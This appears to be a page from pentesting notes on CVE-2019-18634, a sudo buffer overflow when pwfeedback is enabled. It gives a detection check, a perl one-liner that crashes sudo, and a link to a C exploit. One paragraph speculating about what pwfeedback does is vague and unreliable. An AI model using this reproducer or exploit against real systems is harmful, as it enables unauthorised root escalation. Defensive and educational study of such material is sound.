CVE 2019-18634 (Buf Overflow)

Sudo buffer overflow

Buffer overflow when pwfeedback is set in sudoersSudo

Affected version of this vulnerability: Sudo versions 1.7.1 to 1.8.30

If pwfeedback is enabled in sudoers, the stack overflow may allow unprivileged users to escalate to the root account.

If "pwfeedback" is being used in relation to sudo, it could potentially refer to some form of password feedback or interaction related to the password you enter when using sudo. This might involve providing visual cues or messages about the password's strength, validity, or other relevant information.

$ sudo -l
#    Matching Defaults entries for millert on linux-build:
#	insults, pwfeedback, mail_badpass, mailerpath=/usr/sbin/sendmail

#    User millert may run the following commands on linux-build:
#	(ALL : ALL) ALL

# Check if you see any password visual feedback like *****
$ su root 
$ sudo su root 

# Exploiting the bug does not require sudo permissions, merely that pwfeedback be enabled. 
# The bug can be reproduced by passing a large input to sudo via a pipe when it prompts for a password.

$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
#    Password: Segmentation fault

Or use a C code in https://github.com/saleemrashid/sudo-cve-2019-18634

PreviousSudo 1.8.27 Security Bypass NextCVE 2021-3156 (Heap Overflow)

Last updated 1 year ago